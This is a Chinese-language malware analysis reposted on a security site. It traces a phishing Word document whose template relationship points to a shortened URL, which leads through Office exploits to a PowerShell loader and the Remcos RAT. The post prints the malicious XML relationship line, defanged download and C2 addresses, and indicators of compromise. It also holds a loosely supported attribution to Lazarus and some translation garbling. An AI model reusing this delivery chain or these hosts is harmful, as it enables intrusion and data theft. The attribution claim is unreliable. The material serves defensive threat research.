Microsoft Word 文件中的 URL 缩短器可引导至 Remcos RAT

admin 2024年7月31日22:46:52评论14 views字数 3903阅读13分0秒阅读模式
免责声明
由于传播、利用本公众号红云谈安全所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号红云谈安全及作者不为承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!

Remcos(远程控制和监视)RAT 恶意软件使攻击者能够完全控制受感染的系统。它可用于数据窃取、间谍活动和其他恶意活动。了解此类恶意软件通常如何通过办公文件引入,有助于识别和缓解这些威胁。

执行摘要

电子邮件中包含一个 .docx 附件,旨在欺骗收件人。检查此文件后,我们发现一个缩短的 URL,表明存在恶意。此 URL 重定向到下载 RTF 格式的公式编辑器恶意软件变体。通过利用公式编辑器漏洞,它会尝试下载由一长串连接变量和字符串组成的 VB 脚本,这些变量和字符串可能经过编码或混淆。这些字符串形成编码的有效负载,可能会在脚本的稍后部分解码或执行。VB 脚本反混淆为 PowerShell 代码,该代码会尝试通过隐写图像和反向 Base64 编码字符串下载恶意二进制文件。虽然进行了命令和控制 (C2) 调用,但还存在 TCP 重新连接,这表明 C2 可能不可用。被动 DNS 分析识别了 C2 域,但它们目前处于非活动状态。

感染链

我们在遥测中发现一个附件文档(即 sha1:f1d760423da2245150a931371af474dda519b6c9)。由于它是一个 docx 文件,我们尝试解码 Word 文档的结构。我们在位置“word/_rels/”发现了两个文件,即 settings.xml.rels 和 document.xml.rels。

设置.xml.rels

我们在调查过程中发现了一个缩短的 URL,并发现它是恶意的,负责下载下一阶段的感染。

<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"> <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="hxxp://ilang[.]in/QNkGv" TargetMode="External"/> </Relationships>

通过在沙箱中运行 docx,我们发现它包含 CVE-2017-0199 漏洞。利用此漏洞后,它会尝试与远程服务器建立连接,以在受害者机器上下载恶意文件。攻击者使用 URL 缩短服务来掩盖实际的恶意 URL。这使得受害者难以识别风险,并有助于绕过可能标记可疑 URL 的安全过滤器。

此外,查看文件夹“wordembeddings”,我们发现 oleObject bin 文件嵌入了 PDF 文件。该 PDF 文件是良性的,只是公司与银行之间的银行交易。以下是包含已删除信息的发票。

Microsoft Word 文件中的 URL 缩短器可引导至 Remcos RAT

下图显示了执行docx文件时的网络流量。

Microsoft Word 文件中的 URL 缩短器可引导至 Remcos RAT

该缩短的 URL 现在已停用,但我们首次查看时发现它重定向到 URL 即 hxxp[://]96[.]126[.]101[.]128/43009/mnj/lionskingalwaysbeakingofjungletounderstandhowfastthekingofjunglereturnewithentirethingstogetmebacktothegame___lionsarekingofjunglealways[.]doc。

在分析时,URL(上图)处于活动状态并下载 rtf 文件,即 sha1:539deaf1e61fb54fb998c54ca5791d2d4b83b58c。在沙箱中运行该文件(操作系统版本:windows7-x64),似乎该文件包含公式编辑器漏洞,即 CVE-2017-11882,因为它试图启动公式编辑器。下图显示了带有嵌入式公式编辑器的 RTF 文件结构。

Microsoft Word 文件中的 URL 缩短器可引导至 Remcos RAT

利用 CVE 漏洞,RTF 文件尝试连接到 URL,即 hxxps[://]paste[.]ee/d/HdLtf,并负责下载 VB 脚本,即 sha1: 9740c008e7e7eef31644ebddf99452a014fc87b4。下图显示了该脚本。为简洁起见,下图未显示完整的文本字符串。

Microsoft Word 文件中的 URL 缩短器可引导至 Remcos RAT

该脚本似乎是一串由变量和字符串组成的长字符串,可能是经过编码或混淆的数据。重要的变量是“remercear”,它被分配给一个非常长的连接字符串。它似乎是通过反复连接“maleta”、“centralizador”和各种字符串文字构建而成的。反复连接的使用表明“remercear”正在构建以保存一些编码信息或命令。连接的字符串表示编码的有效负载,可以在脚本的稍后位置解码或执行。我们在 VBS 脚本中进行替换后得到了一个混淆的 powershell 代码,如下所示:

Microsoft Word 文件中的 URL 缩短器可引导至 Remcos RATMicrosoft Word 文件中的 URL 缩短器可引导至 Remcos RAT

通过将字符串DgTre替换为字符A,然后进行 Base64 解码,我们最终得到了去混淆的 powershell 代码,如下所示:

Microsoft Word 文件中的 URL 缩短器可引导至 Remcos RAT

随后,powershell 尝试从两个不同的 URL 下载恶意二进制文件。首先,它通过 URL(即 hxxps://uploaddeimagens[.]com.br/images/004/785/720/original/new_image.jpg?1716307634)使用隐写术下载系统中的恶意软件。下图(右下角)包含较长的 base64 编码字符串,其中前 6 个字节解码为“MZ”。  

Microsoft Word 文件中的 URL 缩短器可引导至 Remcos RATMicrosoft Word 文件中的 URL 缩短器可引导至 Remcos RATMicrosoft Word 文件中的 URL 缩短器可引导至 Remcos RAT

该图表明袭击正在通过“死亡笔记集群”进行,其中的 L 符号表示拉撒路 (Lazarus) 组织是此次袭击的幕后黑手。

其次,与 IP 即 96.126.101[.]128 进行通信,以获取 TXT 文件即 hxxp://96[.]126.101[.]128/43009/NGB.txt(如反顺序反混淆的 powershell 所示)。TXT 文件包含反向 base 64 编码字符串。下图显示了捕获的网络流量。

Microsoft Word 文件中的 URL 缩短器可引导至 Remcos RAT

攻击者首先将数据编码为 Base64,然后将生成的 Base64 编码字符串反转,从而创建恶意二进制文件。这增加了一层混淆,因为编码数据不会立即显示为 Base64,因此可以逃避简单的检测机制。在 Cyber Chef 的帮助下,我们反转字符串,然后执行 Base64 解码方案,得出恶意负载,即 sha1:83505673169efb06ab3b99d525ce51b126bd2009

Microsoft Word 文件中的 URL 缩短器可引导至 Remcos RAT

我们继续监控进程。我们观察到有一个到 IP 即 94[.]156[.]66[.]67:2409 的连接,这是潜在的 C2 服务器。但是,该 IP 已关闭,导致 TCP 重新连接。下图显示了进程跟踪。

Microsoft Word 文件中的 URL 缩短器可引导至 Remcos RAT

该IP对应的动态DNS域名如下:

  • newsat[.]duckdns[.]org

  • belgom[.]duckdns[.]org

  • fordede[.]duckdns[.]org

  • logili[.]duckdns[.]org

妥协指标

主题

法克图拉

信封发件人

  • info[at]cieloqistics[.com

  • info[at]pluse-tr[.com

  • 导出[at]aautomatotools[.store

  • 信息[在] tongunpano [.icu

法克图拉.docx

f1d760423da2245150a931371af474dda519b6c9

网址

  • hxxp://ilang.in/QNkGv

  • hxxp[://]96[.]126[.]101[.]128/43009/mnj/lionskingalwaysbeakingofjungletounderstandhowfastthekingofjunglereturnewithentirethingstogetmebacktothegame___lionsarekingofjunglealways[.]doc

重复格式

539聋人1e61fb54fb998c54ca5791d2d4b83b58c

VB脚本下载地址

hxxps[://]paste[.]ee/d/HdLtf

VB 脚本

9740c008e7e7eef31644ebddf99452a014fc87b4

反向 base64 编码字符串 TXT 文件

hxxp[://]96[.]126[.]101[.]128/43009/NGB[.]txt

隐写图像文件

hxxps://uploaddeimagens[.]com.br/images/004/785/720/original/new_image.jpg?1716307634

Remcos 二进制

83505673169efb06ab3b99d525ce51b126bd2009

C2 IP

94.156.66[.]67:2409

C2 域名

  • newsat[.]duckdns[.]org

  • belgom[.]duckdns[.]org

  • fordede[.]duckdns[.]org

  • logili[.]duckdns[.]org

结论:

保护声明

Forcepoint 客户在以下攻击阶段受到保护,免受此威胁。

  • 第 1 阶段(侦察)——收集电子邮件地址。攻击者的地址被阻止。

  • 第 2 阶段(诱饵)– 通过电子邮件发送武器化的办公文件。该文件已被阻止。

  • 第 3 阶段(重定向)——缩短的 URL 被重定向以删除基于 RTF 的公式编辑器恶意软件。重定向的 URL 被安全分类阻止。

  • 第 5 阶段 — (投放文件) — 投放的文件被阻止。

  • 第 6 阶段 - 呼叫主页 - C2 IP 和域名均在安全分类下被阻止。

原文始发于微信公众号(红云谈安全):Microsoft Word 文件中的 URL 缩短器可引导至 Remcos RAT

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年7月31日22:46:52
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Microsoft Word 文件中的 URL 缩短器可引导至 Remcos RAThttps://cn-sec.com/archives/3020758.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息